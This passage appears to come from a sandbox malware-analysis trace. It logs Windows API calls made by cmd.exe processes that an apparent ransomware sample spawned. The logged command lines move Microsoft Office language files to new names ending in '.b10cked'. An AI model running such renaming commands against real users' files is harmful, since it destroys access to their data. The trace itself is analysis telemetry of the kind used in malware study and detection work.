(in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x40, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0x40, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.686] RegCloseKey (hKey=0x40) returned 0x0 [0168.686] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e964 | out: phkResult=0x26e964*=0x40) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0x40, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x1, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0x1, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x0, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x9, lpcbData=0x26e968*=0x4) returned 0x0 [0168.687] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x9, lpcbData=0x26e968*=0x4) returned 0x0 [0168.687] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, 
lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0x9, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.687] RegCloseKey (hKey=0x40) returned 0x0 [0168.687] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886386 [0168.687] srand (_Seed=0x5b886386) [0168.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked\"" [0168.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked\"" [0168.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.687] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x81970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0168.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.688] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.688] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.688] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.688] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.688] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0168.688] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.688] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0168.688] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.688] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.688] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.688] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.688] GetEnvironmentStringsW () returned 0x82360* [0168.689] FreeEnvironmentStringsW (penv=0x82360) returned 1 [0168.689] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.689] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.689] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.689] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.689] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.689] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.689] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.689] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.689] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.689] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f730 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.689] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f730, lpFilePart=0x26f72c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f72c*="Desktop") returned 0x18 [0168.689] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.690] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f4ac | out: lpFindFileData=0x26f4ac) returned 0x809f0 [0168.690] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0168.690] FindFirstFileW 
(in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f4ac | out: lpFindFileData=0x26f4ac) returned 0x809f0 [0168.690] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0168.690] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f4ac | out: lpFindFileData=0x26f4ac) returned 0x809f0 [0168.690] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0168.691] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.691] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0168.691] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0168.691] GetEnvironmentStringsW () returned 0x80210* [0168.691] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0168.691] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.692] GetConsoleOutputCP () returned 0x1b5 [0168.692] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.692] GetUserDefaultLCID () returned 0x409 [0168.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0168.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f870, cchData=128 | out: lpLCData="0") returned 2 [0168.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f870, cchData=128 | out: lpLCData="0") returned 2 [0168.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f870, cchData=128 | out: lpLCData="1") returned 2 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0168.693] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0168.693] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.695] GetConsoleTitleW (in: lpConsoleTitle=0x70930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.695] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0168.695] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0168.695] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0168.696] _wcsicmp (_String1="move", _String2=")") returned 68 [0168.696] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0168.696] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0168.696] _wcsicmp (_String1="IF", _String2="move") returned -4 [0168.696] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0168.696] _wcsicmp (_String1="REM", _String2="move") returned 5 [0168.696] _wcsicmp (_String1="REM/?", 
_String2="move") returned 5 [0168.705] GetConsoleTitleW (in: lpConsoleTitle=0x26f568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.958] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0168.958] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0168.958] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0168.958] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0168.958] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0168.958] _wcsicmp (_String1="move", _String2="CD") returned 10 [0168.958] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0168.958] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0168.958] _wcsicmp (_String1="move", _String2="REN") returned -5 [0168.958] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0168.958] _wcsicmp (_String1="move", _String2="SET") returned -6 [0168.958] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0168.958] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0168.958] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0168.958] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0168.958] _wcsicmp (_String1="move", _String2="MD") returned 11 [0168.959] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0168.959] _wcsicmp (_String1="move", _String2="RD") returned -5 [0168.959] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0168.959] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0168.959] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0168.959] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0168.959] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0168.959] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0168.959] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0168.959] _wcsicmp (_String1="move", _String2="VER") returned -9 [0168.959] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0168.959] _wcsicmp 
(_String1="move", _String2="EXIT") returned 8 [0168.959] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0168.959] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0168.959] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0168.959] _wcsicmp (_String1="move", _String2="START") returned -6 [0168.959] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0168.959] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0168.959] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0168.961] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.961] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.961] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f324, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f31c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f31c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.962] _wcsnicmp (_String1="COPYCMD", 
_String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.964] _wcsnicmp (_String1="/Y", _String2="/Y", 
_MaxCount=0x2) returned 0 [0168.964] _wcsicmp (_String1="MSOINT~2.TRX", _String2=".") returned 63 [0168.964] _wcsicmp (_String1="MSOINT~2.TRX", _String2="..") returned 63 [0168.964] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msoint~2.trx")) returned 0x2020 [0168.964] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.964] SetErrorMode (uMode=0x0) returned 0x0 [0168.964] SetErrorMode (uMode=0x1) returned 0x0 [0168.965] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", nBufferLength=0x104, lpBuffer=0x26ecac, lpFilePart=0x26ec94 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", lpFilePart=0x26ec94*="MSOINT~2.TRX") returned 0x3c [0168.965] SetErrorMode (uMode=0x0) returned 0x1 [0168.965] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0168.965] _wcsicmp (_String1="MSOINT~2.TRX", _String2=".") returned 63 [0168.965] _wcsicmp (_String1="MSOINT~2.TRX", _String2="..") returned 63 [0168.965] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msoint~2.trx")) returned 0x2020 [0168.965] SetErrorMode (uMode=0x0) returned 0x0 [0168.965] SetErrorMode (uMode=0x1) returned 0x0 [0168.965] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", nBufferLength=0x104, lpBuffer=0x26f128, lpFilePart=0x26eec0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", lpFilePart=0x26eec0*="MSOINT~2.TRX") returned 0x3c [0168.965] SetErrorMode (uMode=0x0) returned 0x1 [0168.966] 
SetErrorMode (uMode=0x0) returned 0x0 [0168.966] SetErrorMode (uMode=0x1) returned 0x0 [0168.966] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26f330, lpFilePart=0x26eec0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked", lpFilePart=0x26eec0*="MSOINTL.REST.trx_dll.b10cked") returned 0x4c [0168.966] SetErrorMode (uMode=0x0) returned 0x1 [0168.966] SetLastError (dwErrCode=0x0) [0168.966] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.rest.trx_dll.b10cked")) returned 0xffffffff [0168.966] GetLastError () returned 0x2 [0168.966] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x26e83c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e83c) returned 0x82130 [0168.967] FindNextFileW (in: hFindFile=0x82130, lpFindFileData=0x26e83c | out: lpFindFileData=0x26e83c) returned 0 [0168.967] GetLastError () returned 0x12 [0168.967] FindClose (in: hFindFile=0x82130 | out: hFindFile=0x82130) returned 1 [0168.972] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x81cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81cc0) returned 0x82130 [0168.973] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26ead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0168.976] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x26ead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll", lpFilePart=0x0) returned 0x44 [0168.976] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.rest.trx_dll")) returned 0x2020 [0168.976] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0168.978] FindClose (in: hFindFile=0x82130 | out: hFindFile=0x82130) returned 1 [0168.978] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ea88 | out: _Buffer=" 1") returned 9 [0168.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.978] GetFileType (hFile=0x7) returned 0x2 [0168.978] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0168.978] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ea14 | out: lpMode=0x26ea14) returned 1 [0168.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.979] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ea48 | out: lpConsoleScreenBufferInfo=0x26ea48) returned 1 [0168.979] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0168.980] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ea88 | out: lpBuffer=" 
1 file(s) moved.\r\n") returned 0x1a [0168.980] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ea6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ea6c*=0x1a) returned 1 [0168.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.981] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.981] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.981] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.981] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.982] SetConsoleInputExeNameW () returned 0x1 [0168.982] GetConsoleOutputCP () returned 0x1b5 [0168.982] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.982] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.982] exit (_Code=0) Process: id = "290" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0x748" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22769 start_va = 0x10000 end_va = 0x2ffff entry_point = 
0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22770 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22771 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22772 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 22773 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22774 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22775 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: 